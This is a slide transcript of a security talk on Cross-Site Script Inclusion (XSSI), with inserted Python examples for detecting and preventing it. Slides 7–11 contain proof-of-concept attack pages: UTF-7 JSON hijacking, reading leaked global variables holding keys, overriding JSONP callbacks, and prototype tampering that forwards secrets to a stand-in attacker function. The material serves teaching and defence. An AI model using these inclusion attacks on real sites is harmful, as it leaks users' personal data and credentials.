
The Tale of a Fameless but Widespread Vulnerability

luh2
June 16, 2016


Two key components account for finding vulnerabilities of a certain class: awareness of the vulnerability class and ease of finding instances of it. Cross-Site Script Inclusion (XSSI) vulnerabilities are not mentioned in the de facto standard for public attention, the OWASP Top 10. Additionally, there is no public tool available to facilitate finding XSSI. The impact ranges from leaking stored personal information and circumventing token-based protection to complete compromise of accounts. XSSI vulnerabilities are fairly widespread, and the lack of detection increases the risk of each one. In this talk we demonstrate how to find XSSI, how to exploit it and how to protect against it. Watch the presentation from Security Fest: https://www.youtube.com/watch?v=5qA0CtS6cZ4. The link to the Area41 video (slightly different) will be posted as soon as the video is up.


Transcript

  1. BUT scripts (and JSONP) don't fall under the same strict SOP and can be included cross-domain, which is why we have
  2. What About Ambient Authority?
    ▸ Works just the same as with CSRF
    ▸ Ambient authority information is sent cross-site
    ▸ Leaked information gets more interesting…
  3. “We observe that a third of the surveyed sites utilize dynamic JavaScript. […] more than 80% of the sites are susceptible to attacks via remote script inclusion.” - The Unexpected Dangers of Dynamic JavaScript, S. Lekies et al.
  4. Categorizing XSSI (four categories, numbered 1-4 on the slide):
    ▸ Dynamic JavaScript
    ▸ Non-Script
    ▸ Static JavaScript requiring Authentication
    ▸ Static Script / JSONP*
    * If the JSONP requires parameters, these need to be guessable.
  5. Finding XSSI Category 1
    ▸ Read the code
    ▸ Grep for
      ▹ Public keys
      ▹ Social Security Numbers
      ▹ Credit card numbers
  6. Finding XSSI Category 2 and 3 (decision flow shown on the slide):
    ▸ Re-request the JavaScript file without authentication and check if the response is script.
      ▹ No: script requires authentication.
      ▹ Yes: does the answer differ from the original?
        ▹ No: script not dynamic.
        ▹ Yes: re-request the JavaScript file and check if the answer differs again.
          ▹ Yes: script probably generally dynamic.
          ▹ No: dynamic JS based on authentication.
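The decision flow of slide 6 (and the check that slide 14's extension automates) as a small classifier, added here as an example; this is not the talk's code nor the DetectDynamicJS extension. It fetches the same script URL three times (once with the session cookie, twice without) and maps the comparisons onto the four outcomes of the flowchart. The servers, URLs, cookie values and script bodies are constructed so it runs offline; `fetch` is assumed to be any callable with the signature `fetch(url, cookie_or_None) -> Response`, so a real HTTP client can be dropped in.

```python
# Added example (not from the talk): slide-6 classifier for XSSI categories 2 and 3.
from dataclasses import dataclass
from typing import Callable, Dict, Optional

SCRIPT_TYPES = ("application/javascript", "text/javascript", "application/x-javascript")
JS_CT = {"Content-Type": "application/javascript; charset=utf-8"}


@dataclass
class Response:
    status: int
    headers: Dict[str, str]
    body: str

    def content_type(self) -> str:
        return self.headers.get("Content-Type", "").split(";")[0].strip().lower()


def looks_like_script(resp: Response) -> bool:
    """First check on the slide: is the unauthenticated reply still a script at all?"""
    return resp.status == 200 and resp.content_type() in SCRIPT_TYPES


def classify(fetch: Callable[[str, Optional[str]], Response], url: str, auth_cookie: str) -> str:
    """Walk the slide-6 flowchart and return its terminal label."""
    original = fetch(url, auth_cookie)  # as the logged-in user
    anon = fetch(url, None)             # re-request without authentication
    if not looks_like_script(anon):
        return "script requires authentication"
    if anon.body == original.body:
        return "script not dynamic"
    # The body changed without the session: does it change on every request, or only with it?
    again = fetch(url, None)
    if again.body != anon.body:
        return "script probably generally dynamic"
    return "dynamic JS based on authentication"  # the classic XSSI candidate


def sample_server(profile: str) -> Callable[[str, Optional[str]], Response]:
    """Constructed servers, one per flowchart outcome (hypothetical, for the demo only)."""
    counter = {"n": 0}

    def fetch(url: str, cookie: Optional[str]) -> Response:
        counter["n"] += 1
        if profile == "needs-auth":   # redirects anonymous callers to a login page
            if cookie is None:
                return Response(302, {"Content-Type": "text/html", "Location": "/login"}, "")
            return Response(200, JS_CT, "var user = {name: 'luke'};")
        if profile == "static":       # same bytes for everyone
            return Response(200, JS_CT, "function init() {}")
        if profile == "per-request":  # e.g. a nonce or timestamp baked into every reply
            return Response(200, JS_CT, f"var nonce = '{counter['n']}';")
        if profile == "per-session":  # personalised only for cookie holders
            body = "var user = {email: 'luke@example.com'};" if cookie else "var user = null;"
            return Response(200, JS_CT, body)
        raise ValueError(profile)

    return fetch


if __name__ == "__main__":
    for profile in ("needs-auth", "static", "per-request", "per-session"):
        print(f"{profile:12s} -> {classify(sample_server(profile), '/app.js', 'session=abc')}")
```

The "dynamic JS based on authentication" outcome is the one worth a manual look: the script body depends on the victim's session, so whatever it embeds is readable by any page that can include it.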
  7. Finding XSSI Category 4 – Non-Script / Browser Issues. These issues are related to browser security.

    Server response:

        [{'friend':'luke','email': '+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-'}]

    Which, decoded as UTF-7, translates to:

        [{'friend':'luke','email': ''}];alert('May the force be with you');[{'job':'done'}]

    Malicious website:

        <html>
        <body>
        <script src="http://site.tld/json-utf7.json" type="text/javascript" charset="UTF-7"></script>
        </body>
        </html>

    Source: http://www.thespanner.co.uk/2011/05/30/json-hijacking/
  8. Case: Global Variable

    some.js:

        var privateKey = "-----BEGIN RSA PRIVATE KEY-----\
        MIIEowIBAAKCAQEAvq7kdxjZq4naHB8jNTMrFsiSKhmf8rpsRWO0iS5EK/c+evvT\
        [redacted]
        9abcosxptnnP286cyq7whYysfe5HqODAwZJp5SGFPKqilWE1MBur\
        -----END RSA PRIVATE KEY-----",
            keys = [
                { name: 'Key No 1', apiKey: '0c8aab23-2ab5-46c5-a0f2-e52ecf7d6ea8', privateKey: privateKey },
                { name: 'Key No 2', apiKey: '1e4b8312-f767-43eb-a16b-d44d3e471198', privateKey: privateKey }
            ];

    Including page:

        <!DOCTYPE html>
        <html>
        <head>
          <title>Global Variables</title>
          <script src="some.js"></script>
        </head>
        <body>
          <script>
            // some.js declared `keys` with a top-level var, so it is a global the including page can read
            alert(JSON.stringify(keys[0]));
          </script>
        </body>
        </html>
  9. Case: Function Override

    Response:

        angular.callbacks._7({"status":STATUS,"body":{"demographics":{"email":......}}})

    Including page:

        <script>
        // Stand-ins so the response's angular.callbacks._7(...) call resolves on this page
        var angular = function () { return 1; };
        angular.callbacks = function () { return 1; };
        // The slide writes angular.callbacks.7; a property accessed with a dot must be a valid
        // identifier, so the _7 form (as used on the next slide) is used here
        angular.callbacks._7 = function (leaked) {
            alert(JSON.stringify(leaked));
        };
        </script>
        <script src="https://site.tld/p?jsonp=angular.callbacks._7" type="text/javascript"></script>
  10. Case: Provide Callback

    Response:

        angular.callbacks._7({"status":STATUS,"body":{"demographics":{"email":......}}})

    Including page:

        <script>
        // The endpoint accepts any callback name, so the including page simply names its own
        gimmethatdata = function (leaked) {
            alert(JSON.stringify(leaked));
        };
        </script>
        <script src="https://site.tld/p?jsonp=gimmethatdata" type="text/javascript"></script>
  11. Case: Prototype Tampering (Note: example taken from S. Lekies' paper)

    Including page (runs before the script is included):

        // sendToAttackerBackend stands in for whatever the including page does with the value
        Array.prototype.slice = function () {
            // leaks ["secret1", "secret2", "secret3"]: `this` is the array slice() was called on
            sendToAttackerBackend(this);
        };

    Included script:

        (function () {
            var arr = ["secret1", "secret2", "secret3"];
            // intends to slice off the first entry, but calls the tampered slice()
            var x = arr.slice(1);
            ...
        })();
  12. Preventing XSSI
    ▸ No sensitive data in JavaScript files or JSONP callbacks.
    ▸ Correct Content-Type
    ▸ X-Content-Type-Options: nosniff
    ▸ Anti-Cross-Site Request Forgery token
    ▸ SameSite cookie attribute (draft!)
    ▸ Spread the word
    ▸ Report them
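The server-side measures from slide 12 put together in one endpoint, added here as an example that is not the talk's own code. The sensitive data is served as plain JSON rather than as a script or JSONP callback, with an explicit Content-Type, `X-Content-Type-Options: nosniff`, a `SameSite` session cookie and a per-session anti-CSRF token that must arrive in a request header, which a `<script src>` tag cannot set. The handler is a bare WSGI callable so it runs without a web server; the path, session store, cookie name, header name and the user data are constructed for the demo.

```python
# Added example (not from the talk): a profile endpoint hardened against XSSI.
import hmac
import json
import secrets
from http.cookies import SimpleCookie
from typing import Dict, List, Optional, Tuple

# Constructed in-memory session store: session id -> {user, csrf token}
SESSIONS: Dict[str, Dict[str, str]] = {}


def login(user: str) -> Tuple[str, str]:
    """Create a session and its CSRF token; returns the Set-Cookie value and the token."""
    sid, token = secrets.token_urlsafe(32), secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": token}
    # SameSite keeps the cookie off cross-site subresource loads such as <script src=...>
    cookie = f"session={sid}; HttpOnly; Secure; SameSite=Strict; Path=/"
    return cookie, token


def _session_from(environ) -> Optional[Dict[str, str]]:
    jar = SimpleCookie(environ.get("HTTP_COOKIE", ""))
    morsel = jar.get("session")
    return SESSIONS.get(morsel.value) if morsel else None


def profile_app(environ, start_response) -> List[bytes]:
    """WSGI handler for GET /api/profile (hypothetical path)."""
    headers = [
        ("Content-Type", "application/json; charset=utf-8"),  # never text/javascript or JSONP
        ("X-Content-Type-Options", "nosniff"),                 # and no sniffing it into a script
        ("Cache-Control", "no-store"),
    ]
    session = _session_from(environ)
    token = environ.get("HTTP_X_CSRF_TOKEN", "")
    # Only same-origin XHR/fetch code that was handed the token can add this header.
    # Constant-time compare on bytes (compare_digest rejects non-ASCII str).
    if session is None or not hmac.compare_digest(token.encode(), session["csrf"].encode()):
        start_response("403 Forbidden", headers)
        return [json.dumps({"error": "forbidden"}).encode()]
    body = {"user": session["user"], "email": f"{session['user']}@example.com"}  # constructed
    start_response("200 OK", headers)
    return [json.dumps(body).encode()]


def call(app, environ) -> Tuple[str, Dict[str, str], bytes]:
    """Minimal driver so the handler can be exercised without a WSGI server."""
    captured = {}

    def start_response(status, headers):
        captured["status"], captured["headers"] = status, dict(headers)

    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body


def demo():
    """Returns (cross-site include attempt, same-origin fetch) results for one login."""
    cookie, token = login("luke")
    sid_pair = cookie.split(";")[0]  # "session=<id>" as a browser would echo it back
    # 1) cross-site <script src="https://site.tld/api/profile">: even if the cookie were sent,
    #    the script tag cannot carry the X-CSRF-Token header
    cross_site = call(profile_app, {"HTTP_COOKIE": sid_pair})
    # 2) same-origin fetch() from the application's own page, which knows the token
    same_origin = call(profile_app, {"HTTP_COOKIE": sid_pair, "HTTP_X_CSRF_TOKEN": token})
    return cross_site, same_origin


if __name__ == "__main__":
    for label, (status, hdrs, body) in zip(("cross-site", "same-origin"), demo()):
        print(label, status, hdrs["Content-Type"], body.decode())
```

The token check is what closes the gap that ambient authority opens (slide 2): the cookie still rides along, but the data only comes back to code that can also present a secret the including page never had. Serving JSON rather than a script means there is nothing to execute even when a page does manage to include the URL.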
  13. Links, References, Interesting Reads…
    • http://jeremiahgrossman.blogspot.ch/2006/01/advanced-web-attack-techniques-using.html
    • http://incompleteness.me/blog/2007/03/05/json-is-not-as-safe-as-people-think-it-is/
    • http://www.thespanner.co.uk/2011/05/30/json-hijacking/
    • http://phrack.org/issues/69/12.html
    • https://www.mbsd.jp/Whitepaper/xssi.pdf
    • https://www.usenix.org/system/files/conference/usenixsecurity15/sec15-paper-lekies.pdf
    • http://sebastian-lekies.de/leak/
    • http://miladbr.blogspot.ch/2013/03/cross-site-script-inclusion.html
    • http://www.scip.ch/en/?labs.20160414
  14. Released DetectDynamicJS Burp extension to make your life easier in finding XSSI
    ▸ Passive scanner module
    ▸ Filters for JSONP and scripts
    ▸ It's in your Burp Store
    ▸ Currently only implemented for cookie